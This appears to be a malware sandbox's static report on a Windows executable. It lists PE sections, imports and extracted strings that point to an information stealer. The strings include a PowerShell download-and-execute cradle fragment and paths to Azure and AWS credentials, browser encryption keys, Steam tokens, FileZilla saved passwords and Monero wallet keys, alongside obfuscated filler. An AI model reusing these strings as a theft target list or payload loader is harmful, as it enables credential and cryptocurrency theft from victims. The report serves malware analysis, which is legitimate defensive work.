Static | ZeroBOX

PE Compile Time

2024-09-30 03:19:54

PE Imphash

8e9e6de8c6aa184371108e1074479bb3

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0001cc8f 0x0001ce00 6.09221893672
.rdata 0x0001e000 0x0000cf8c 0x0000d000 6.64532766141
.data 0x0002b000 0x002303a4 0x0001e400 5.95438403199
.reloc 0x0025c000 0x0000459e 0x00004600 4.49234790412

Imports

Library msvcrt.dll:
0x41e0b8 strncpy
0x41e0bc ??_V@YAXPAX@Z
0x41e0c0 memchr
0x41e0c4 ??_U@YAPAXI@Z
0x41e0c8 strtok
0x41e0cc atexit
0x41e0d0 strtok_s
0x41e0d4 strcpy_s
0x41e0d8 vsprintf_s
0x41e0dc memmove
0x41e0e0 strlen
0x41e0e4 malloc
0x41e0e8 free
0x41e0ec memcmp
0x41e0f0 ??2@YAPAXI@Z
0x41e0f4 memset
0x41e0f8 memcpy
0x41e0fc __CxxFrameHandler3
Library KERNEL32.dll:
0x41e000 GetCurrentProcess
0x41e004 RaiseException
0x41e008 GetStringTypeW
0x41e00c MultiByteToWideChar
0x41e010 LCMapStringW
0x41e014 IsValidCodePage
0x41e018 GetOEMCP
0x41e01c lstrlenA
0x41e020 HeapAlloc
0x41e024 GetProcessHeap
0x41e028 VirtualProtect
0x41e02c WaitForSingleObject
0x41e030 CreateProcessA
0x41e034 lstrcatA
0x41e038 VirtualQueryEx
0x41e03c OpenProcess
0x41e040 ReadProcessMemory
0x41e044 WriteFile
0x41e048 GetACP
0x41e04c GetCPInfo
0x41e058 IsDebuggerPresent
0x41e05c EncodePointer
0x41e060 DecodePointer
0x41e064 TerminateProcess
0x41e074 RtlUnwind
0x41e078 GetProcAddress
0x41e07c GetModuleHandleW
0x41e080 ExitProcess
0x41e084 Sleep
0x41e088 GetStdHandle
0x41e08c GetModuleFileNameW
0x41e090 GetLastError
0x41e094 LoadLibraryW
0x41e098 TlsGetValue
0x41e09c TlsSetValue
0x41e0a4 SetLastError
0x41e0a8 GetCurrentThreadId
0x41e0b0 WideCharToMultiByte

!This program cannot be run in DOS mode.
.rdata
@.data
.reloc
j=h@2B
jthx3B
j_h@5B
jMhH7B
j%hH8B
jYhhFB
jYh8GB
j&h@KB
j&hhLB
j$h MB
URPQQhp
^SSSSS
;t$,v-
UQPXY]Y[
t"SS9] u
PPPPPPPP
PPPPPPPP
Unknown exception
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
CorExitProcess
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
Qkkbal
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
NtQueryInformationProcess
InternetSetOptionA
HttpQueryInfoA
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Windows 11
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
CurrentBuildNumber
steam.exe
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
-nop -c "iex(New-Object Net.WebClient).DownloadString('
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\rundll32.exe
/passive
C:\Windows\system32\msiexec.exe
%s\%s\%s
\.azure\
Azure\.azure
\.aws\
Azure\.aws
\.IdentityService\
Azure\.IdentityService
msal.cache
steam_tokens.txt
fplugins
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
"encrypted_key":"
ERROR_RUN_EXTRACTOR
ERROR_RUN_EXTRACTOR
AccountTokens
AccountTokens
SELECT service, encrypted_token FROM token_service
AccountId
Preferences
\Brave\Preferences
Google Chrome
%s\*.*
\storage\default\
.metadata-v2
moz-extension+++
^userContextId=4294967295
prefs.js
\AppData\Roaming\FileZilla\recentservers.xml
<Host>
<Port>
<User>
<Pass encoding="base64">
browser: FileZilla
profile: null
login:
password:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Password
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
------
------
------
------
------
------
------
------
------
------
KQU9ZK8TRGTMN44
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
@@@@@@
 !"#$%&'()*+,-./0123@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
ZEGSEVPHCS2P95
'7@5JF
J9Y1B4UG8N4K
]75Y<M
38B28ACF
_K6@[ 7
45T148B8Q3
{E1_qN'V%r
UO5XXK938N0T
=P9,.|E] D
G2Y41QFJT2N
7D2VZE2PPGL13FBYOLY0
5!-D_2
D9GV3GK2BBXI4D54VE
P5"F&'s..7*q<{A;$
4BAIPVEOQO0
b+3=%7)
ZOZ00286H2S4A
*.cIALS%{=R.
ONTD6ZJGDKQW
'&0C;&
Z5UVQPZ5B
LW7SEK78NMLHA3BC
*&GM:(>
BR1FUWEI
.!E46'<
DA7NL0N288C0VV
>_-WKK
2OLIZ7FPZBSTO780R
/E4546
& T]C!
ZSYPDNUX
6 -"(+;
X9SJB1KQQYM
C$24*>
3L7GDYK551LP4HQNI6FZ
t X%%5
PX^>)g<0:<E
B1VC8WFXKHD8J
W6F2LV03RY5LTYCUNCTK
O5F);dZ?<a#
9KC05IRSWVXY
X/5QE aay245
NGHKLV7LO
)#!x~xS #
5UCZ0P7CD7
FTXJL4P6DEI
G6AH7NR1J
)B%$[`6]&
1EI5D09AE3TP
v =`7UK
TYSEZ66Q6
+6$.Sr
Y4HGZXBS3CQL3
FAL1GV4O2
$ T&%Q
KU2WHSCHQULMDKAYNC8S
K0DEZT
8C'$42
R380KWS6TXOC
PTQVV5
9QB0KD2
S66RTRX
6YBIJZKZ4H0
17fo2>u
NKLWOCYFHEJR0T4720VOA
&?8'ulvwppd`
F1F1SHM
5X*T=+(
KV4973R5R42OJSXHKZO1R
xz5iqxt?Y"
9I30HTF564MJW3XW1W
1VW6ISUIS7EELNBJZKL9U9Q
v3#s'%<;<Y( ":
+("-[9\
EXYAUSDMLU0RHDLKXL
8!B;*18.+
YMPFSSKVR6
1F7Y2ERI
y#V)t77,
TR9ZPU2TV63
FO9XY6XB9F
G09AGVFWCYDWC1GL874M87O1
8,5,2/At~kYU=K_ E
MS2RJ1FDRDM1AY
+.T2*
I9W7TH0TLHRM7
K8T1;Cg~
ZGXHJMHYY2YN
KT9E9POKKY5
&\ u9-9*+L
ZAOGB3GV964P745DO3AUG8
YRZ6"R5<(V
TIY1OL2DBXAL7G5FF4RH
,-b6?F!/
.;R5f2'@';
ZRQDCJEL9RKEY0RFSKO42
%#6B?''" Zs
64GPV7ZIJXFD9JC2UYEH
?Y>&=+
-K/ F:+<
QDUN6WGZZX5QWO
6:-S$4ih
2WJYQMPD03EBZR
>.1(Uz+$5
PN7VJXM3K3S90ASV2ZQUQQS6
9=?w.U2L\59Q;=00>S
I22NM0I47ZJMZJG9C9
LQFQWPUEBPU
EA95BMR48QUVY
(*@~893
BA0G6SSRS
REC01GN2H
,-Tr+!A-
Z2J2YKRX7YEDS14RPVYOIS6
W>w7=;*X7(!=Eb3"?8-%6w
DWS42LVLQG
I42OIMPZIV4NO
9MHJMVYN
9G5GGFQYMMNX7J
"$ ,R8
7CDGIJZA7
CZHTSVCIZ22
JY7HCG9B5JQZRZ
PFFGMOY9I
3R9W7CKDX5E9IF
e;K#B"'
*Z1\*2
5ECKXEYWA03CQ6CNNDKPD0CTB8UF23MZ
7"04 \c1>U&==+9
*V,&/Y!/]]
GAJBJEA4UHQJ
+65q':>8
25WOAJSAZ
^F#=":*/
3BFBSJZTS3GND6QWAEJ
CP46J30GMG
<[T+_v5("
FSLLAN8EA04LKCNJ5Z9
_y9'7'
G19FJ8K9E5I
1DNNNK5BDTR
9Z!!'!
SANO1E2SA7BHGOFN
$<"X+S'$g0'$*5=
CNZN4I18187ZDO4VQYJ
A;C]_Lg(+,Q%"
915GFHV5K05
^U\7*=%
H9I73YNFW
JIPW3HCPWD
(*".C<m4;(
Q1REFVHGUGJ
&X<,(3<i1+&
MRI507RGUGH
>:%BQG;i1+$
KC90MIN7EFJ
8+\\!z|
HJE04CLWR
89$@]m(;>
38N71G0CJVJB
AK:EE*W1d2&.
7IQPEPI82WCDDK80ADO48Y
t;4115
W_'"0-)TU
OMYC8FRLYS6H
JBYLZW
CXYG6K3RH9BG
=5"B.|0"\!3
GOCI4E0BQDRR8TG5A7
=&(@ s-<43&Q6+P
CZN21LAHQOJR8RKRLRFBHUUX
>'Bv)5
<.-7}<(=(741
G9GHIMD8QK7L2OX1HWYM
(0q<*P)w!;^,2+>
28E9GQIZ090SFZW1E39DKLBYU9Z
#,;D\r:276A
63N3U6I5H4HA2E
qW'C9C:f<U:5G5
OHRTPGD26XOXUBR
,;$<27a^-;<:5<
7QPH1L5NFGV64O672G96D
p598b-C+
YdF5\W)
TEE2VD70P7LHNJN1
-D@?D)
3B2T4MN3
t&[$r?+V
JJO9ZVQUFONMKOFH7WZI
JZQESF9FHMIH1LSMZ7A3Q
(4$'#j2:((%~"
1B96BRO5UWHWET
r-lX+<&A<6$>?1
U2JRTWKN2FFU
<=#"/^/<0
952R9W61SXRIQYVJ
zZq \6BT
6!=075/
W0AVX18UQQQHGNJ30QSSDCWV0M
0?4#)3+
J]<6'6*4
A7LBA5AA1CFU7H7HBSFYVFOYR9FC
[/X:+'.4
4 /;]#1
GTDO5K0AJPPUG
66E?t$)")%3
FWGYFTKV5BEQB15TW
7>2TG .
TAZ84H90ZXQ68VCU
(AD<}U),#YA
RPSH9MQ5RKR983T5RW6P4ILOH7Q
U_\&\&?[
F&:&,R#
54Y7PB6TLMLWH
rQ-`9,R;;)4<
T4QUZ925EVOLZXZJ
?JYA*&
UA2MC8CKHSG
-]>&o*%,<0
9Z5A10ZHE
N)E3X^..
U1IJVZNGKHJKUL94XHX
3=7')3
0:PW=;
B0V6DIMA2ZRNO37L31T0M
U"}!0/.S(6
.JX9G}=C9
U599J6PO6G
DTBFO84FB
3'24&V@
JZVR234RW9FCERKR
4W64M6W6TO4MX
f2Qq#C:}16q5
TN8VSQX9OHGOO
#46r*1
2P0D8B1YTL7
T-B<)N
LZMCZ7O9S3DVH
4B"o2_13
QWAXRQO0P7EHFPP2V8AB
AK2EVJQ3G6UZ3TXMBD
9K5"?C5Y!?P
HC7G62I4TR8G65DT
p"Bt&X07J
GG36BH9VUTMPNW2
A36!95
C1R17E4NA5008499
_&TE+Q:
EU^mFUx
ZVKNRSEC9DLWMP2Q
8?+ = 7z+"9(3F
7Z5PPDGOM23ALRA1UUW
~4A5"*";
3DJLUWP233HBU
z*>)'95F|C-,
CK2J8UTVP5BZZE1R
?F:k0:2
P3/?6E
CTB239MYOL3ALMUE
6B|I(7
)B4)>!
0I7AZ13AABNHIW5R
y'C$(_V5
YK1KFI1D7E4W0TKDK
%E.4'T0t7U4[
68QG02KZ
B21VFQ2
QLLAUK8R
Q4DV7GKQ1K6LXO
U0>z&?2Y
L7SQUEQ9R2XCGPHJSA7Q
:!$U7t1/"
AMWHNS1LALIEEC
</!E$?:,*-
ANRDZ3AQMK75A4JR16N
!=Z2%(9eP2[? RS=
HO9LLDBNF
9FUS7EO31PKE
*@B9$+
PT9MKSS6CTUL
#%U$?6`i,$0"
17YBCGAYP5RG0O76PP
BF5+7"r
G77Q=Ri&b
ZLWJ1498BUTR
)=;#EQ
DPVI1APN0VOWYUB2V5V
7!: E$c
S9#"4;
WQW3IZRF3BDFQF81
$ ;Z=?a
U+*'=/BT
CVSW7QCYE79VH
0'?>C4p
3HNF97BQWNTK4WMWP8RZ
@9"/MRq
4!8>Y9
29HCJXFN8YKZ67A409Q
AH$*>=u
[6'/[Y
H6LPH9LC40BZ8
-X/"1I8&Po)?A
AK6M1XS7C3O7WR6PRJ3RT9D
C74E"^
V#3j>!9
7ULX79MG
ASG4PDEQJ3SF
,0%.\$(
F7FHIEJRJC6KAG81Q9U80WN
-B.3)Y]
\,k\8:
OPXRMM3UYB379
PDP20578V63IEN9JI
otBL>S]=,-X>,
UPTT12UX6EQSIIH
r 2!09<
I9MMU2H5YP2T4IH
']/G8=v5@(
93KQROOQYK4E30RPNXW9FBWYPMU4D8J0PYEXH1124SXCZYNEH9O5HIC8GWBE3
o>+"S,]o'""twL5'%71 0k2Y&E5ue()BBE[!<
cT(0++@
TMZBEYEW4
6?556<7m
IW53FWNU8
9%ZU/;+o
TNSGWGQ
8!4.9}q
VZX8KG8AV9
&;+K<(J%l
9ODPUVX
KFN6IFX
#:A&43
VSSQNX6
5<<:'=E
PUN1Z8KM1NECHV57ORVO82MAR0B9D51TJ9FAKTPPW5OJRPK4S0R0JQSWIMJ87LI5WU3HP4W4CG1COCTBQGRNOBK2RT27KRRKWSX6VCPXDWYDYPIF3HS0
PF91=^.@h
A5>Qja"'
#2V:87|k
6H"Y84
{dr}g</"'g
7:QE2"&.3
.W:65x"%6)y3&)X!6C
ZUVYRP5P
; "649Y<
WQN14K1MHDBKWEC81Q1BCWTMTUNCDOHA
#))'gw3"TD4
m5 :,"&$-
N0G1F9A
&Y4E)K8
V0ID7ZVQUSW6AY3MA6BHJ6YJ26B757L
v$'?wp
~m4D.;jz
QGL3SWX8E3TQRGMTNF4E10YB8KBXXUXH3FURSTRKNJFDE3KZZNS2QYAZRJ4IU9KUGMWMW4B4XU0RVV6FAL7JC50EE49IYJZ
U!2Q9#,1:6
^);&;xr.6:/6$G"54
*W0+mz1+F-
W>8%(%
2Z!F!%D72vp
)1PT,1kZ(+.)
O9V72G
7D5MXE5
8SE6NZ
A6$Dtz
HIBARK
+(0%hk
VSI143F
<&Z]V5
N4MSAXE9CI
C7O05FVZ
D49CRM8
]J7=?A
DWGXZLATR0B
(8 14?o>!_,
WAEIJ0EA9CDU0
MWB18GLN9T7B7
8$'CV&!+
LN6CO6A3TUV4VI7QN
) U16F5V0
%Q$'V<+
59CPLCJJULOYXRHGL
PW "53>/1
.*+%'5(
YGT73CQ6M7O6WX79S9LX23VWF6DOXJ3GNQH2SRSA3MINA2A3JH2PPQD4V7268CICDHSFPERAQL3QV
w1Dq'M<
\_/{fF%;0f
-Q& 6m
(1>(@8j&S=5}dB7[GS
1.>'Z4%
HVN5JEQRO17MNGUZVB1DFK2J5OFZ28EWXIOLPBY72VZQ
q4&T[) &8?zbG%*>Wjs
/ >=*0DF9((
V2C76K5JCMQ73D9580ZPWKZE2IKUM3LTULXCL
?1!qqa
'';&W:k
H3RD4TK2RSLB39
+\=/]18
!" +G\
B6J3LD7FYAK6JB7MRP
$Y8^$-D2632
93[$&5
7T17HM20OMK09
G8PT->
C>!"D\
ST4JWKS
#8A->%
M9NCFR28KI5FB6EJHEY7BUYV
V-"*rw@?,[5+Y+j
-C+;>%
57B1NP2KB9C7FZ20T3QFQFZ
J?'W0^)4
c1G%/?!)
COJWE7MQ2
!.2=R)
K2GHPBV5QUDB
3GDSM8OHETE0I8N
D3XMZSK
XNSVKRIVZ6BXJHGD2
;&!9&7d3"B'69!(*m
97JX1XQ8RYRB2IOTSSZA
d1_<4@7=6
%*"6?>#
0X78T3IYVYF
6Z4N1JW60BW3
F([(X&2E
30T6YX
PX&Y4=
BLAKE7O
$%3.#X7
2M3TVM7
E,_839D
4WK6W99E4DIA6
UBS7QPX3B08R8LJKAKFG93A24CRD7R6CEA4145CFYE36
}Q1J#9$'?
P]%]C0r
u673Q_@c&4*,\X
LOXX0443C37
=7<EW@}"^R
U5T36N8RRPEHAS49E
6ru!rd7
QPP4MDXD9LDD0F1ZHEIJCPAZFIOZVCLC16IX8DH1606C4O
&"7CW%
J++TECY1h
1KNS2NVZCBPZYEZ7S79
a9!0W=%51
AL46D1D7RNMT841REMDJ7QB3HIIPDC8H9C4C6NJ0ZQEMZRQ56WU
$7J[B=#9
^?&\?:
11J-W7b&D=#_4
#3<"AW;9
VOXCUJAZ5SX
&+39+8
3OOEU5AYV0CMTR
w&<59T8
3B0$;<
LYEZ1MSQRN3LA
<1-^?8q
J25YNICW08
V7U5HB4SBEUIV69D
uv'7Z'0<oiev{
FEM6BKI506ZBYER
<>B'&ifE[7#+<h
5U0S1HRLP
X41GPBH
8ZKC7J47KZYFLL336
E)\^??:29>V
XZX4OI6Y37JGT
Qwxa<,D
CQZY1MOCTW03ICSM9E
^ ?6 2B
3A4T0NMUQNNEMV0
1WIQXUQP
4DC7BGFOM32PG
=ic{#)!:,TWjg
YSZLLG5BZPJFCQ
)>W-;".5yq
PJ5MUNVAQXQ
4>".!bq
KOK8AKTGUCETELNVN
Bbkj4%:.;$e
EY319Z0F
QRIBVXBB5B2U
>*'#Q1
CYE08SOKZ1
JtesW!*8`
AG1H514Y
LZU3U3LE9PCSJKVALQUC3QL
Ewuw<@<)X)c
/89-9%<,]kl
PQZQBKN
1JGGZDAJELO4
T8HHR0V16PH154O
V;<3\:TRp
FN4MJ4VX2L
"XmG3*Av
CURABLJY87MHI
3'">ymD(:s
IZQTQMCPL5Z46
(>74>0p
K8FA7LP5OGD04D8
8A55R!
D66B7EVX3KE
"DS'U)evW')
K061Z2FFBKS
&_LV6G#h&'?
89A2N3TM2VID
LO8X71YL
LZ2AY9WQKUZB
?5T56R9be16.
XU86BE12DRSSCXUM
.6JC,1X_!cgcm<9!
0FINN9
0PBW2A5H4
3b$F G<
HJ8AOJ0FM
MYYN0ZBAN
VAPKW5H47YTPMR
2NB7BD96M65US
1NZMU2XKHO7
XD3UMBW79H6AY2
97OYXTOCNQQHM8WZG
U8EJ8KOT
5IWT4SV0M
i->'W<$T
DFYXKJALBUSBWAELJQRBVEF3N1RUBD
6;*&a6:!#0$
/'7.2'
WYI7LOXWXLLTLQBTIIRHVB
,#>5+4
8,?7$2
EY0995KT2PK8832YY0
UU\R95_p
]KXF6)l
YW3F0B3Z1
3SID3RUUUHLO1MET5
wk~suemf
0TT1T8I87YGKDQATM
QQNJIRML6KYW42QGU
C9ZLKSMVWSFDY5EAT
26F7RCGP
fS*R51&=
G7AXW8GH
V2+ W5,
IOUWL9UBWU7S5Y43JTWP9FRDFSW8EK5D9HNJ8016FC62DLESCHNCM1ID6RQ2NV7MZ4SYKU5S2ZK7JY94OE57620I9JMRK8TUFUDJ3QHSM4KWQK4HRVOJZ9P6DJY
OTWL8DMT
3#;X''
^0G6G\,
P(6+1 wv
v1K:+$LfTD5*Y\
,=''90m|,7E36[ 1
/V 8!P>n
9X,0UQ<
zBB^_&R
BHNI3GZ1YV0B76NVBRD2YPEAYUJ5FEGGT2GK8WRQ1TFW1UQMLONP9R9VCNTI64VUOURF0CWPAXAFJSIED7T111GC2
L63BX3BQ
'(=D&(T
Y!EY=9$&
}?6,"<
!F+$W<
C; >]0"
::<V=R
z}c|ur
zcxupufp
UIVCIT67VHHDLVI18PMQ4LUEPF9K42XNPMG4BM1DDIYKBA1LL93M3V8IXQXCTWC2U3X8PN0VXIMVXJCONY959LU3O
XQVGF55R
&07>5DR
!'>9:^^$
%9+[-&m
6&?".$B
LG!\9S
7GUZYURF50IN357IHYUIMVOOIZ5XH3JI3USGF68Y5Q1S3BU2BW1W9VBL2GQ9Z47BRATIN0DKZ6N535UHECVVCWIIS
CTGTVDGF
d(3..4 #i} -AZD&.-
F!?()]d
G>W:_'&n
"E;V9)
rqrfpgx
sdwdftwr
GO8Q99ATZB3SLPLTQ6DHFR7WJ4WIM941K0GME407MME40Y3WKBV0FBMYRMHFM2G0GCIVJ9OWGF42NC5UBA8KOEVIN
Y1TXFJ
P627I0Y0E
^%NX31
Z0>??;7B
4^4/hf
h~>D+"*_lg?"#]\<@
7"\)-&
BB;@5U
S51XVUUGOXXQHNLX8T9GUKOQWDM35LBR9I1DW9VVKW9PIE3XXXPUVC3HQLARI1KCWGQ9WHA98O67L9IRKYFH5Q57
LTVCUYB5CNWOGH3QXYUP5
Z066S1JW1CO
<SE/7'0
1;#'=#>L
n.;/ &$d
VF?#5P'Vd
L4%2$M5$
c*7>9930oqb{t
w{wft`
#796-^/4,(=]%+w!(A
I868P0E2JRL5
([UW%^1Ad*!Y
PPV8KQN
$?=]%kn
YSRZIY2VAEU9JG3NZG5A
<4.>8@3
Z8ODMGURT
324M533O
oQ[#SZT
1FC12HVB61
R)-W[/x4RW
OPYZENMBDLCGLZXO
-*** b,<)
NA9ZYY62HIBVNM5R6BQ6HDZB
(X66>u]&/+1
;P Z#(
XPD25U4MEO4VCHCZS5
49&@T'M+*#P31;m,7S
S5L1X1PUJKJ0GK
?Z+X6D#088dF#-
K8BJUD7
k6/4)k
WNZQ9SKOZ80
$?68M6xa>T\
NLU3Z61M
,>:D)SC>
KEF3FP85RWKYIFGULTM
/@%?JQ
#$2,(4{8,9
5ZRIERI0XM3WD189KTFV8NZLCWDDH
9r=,?,_-9
mt"3Tnu*cx5dj
E0JTAM435BM7YLTYAG6KF6AF8ORAFGSNESSWUD
>;>3&[
a6-*eqncs6/<0
CPDFOS3XKBFXCPH2CIZDVW44YZS
&=W7<1
+:#<W.zh
D7DQH9RRMKDQ4SEDGLQK6QRQUIRZA55EJITFL0UC0H1LSO9F
X*%-W&
s(1+88;W#&~3& 7lQT1+rt$#E;'Q:Hq~b
ZRAXPX68
S2RQP8GW882Q0OUYZG7GILEVDOP2H6ZX4VU7ZK
]<%5V3z|QA!_<<-3(Y}i**$)b4S<WaxZ78Rgi
ZZ0GY6MAT
EWE4X8O
(26G9_*
KN84ER73YE558Q8E5NJ375A39ENSXVQJNS8L
akbd|yk
05BG8TMOSSE2GS
CV0"]:>'<'kX74
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
wallet_path
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
SOFTWARE\monero-project\monero-core
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
\Monero\wallet.keys
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
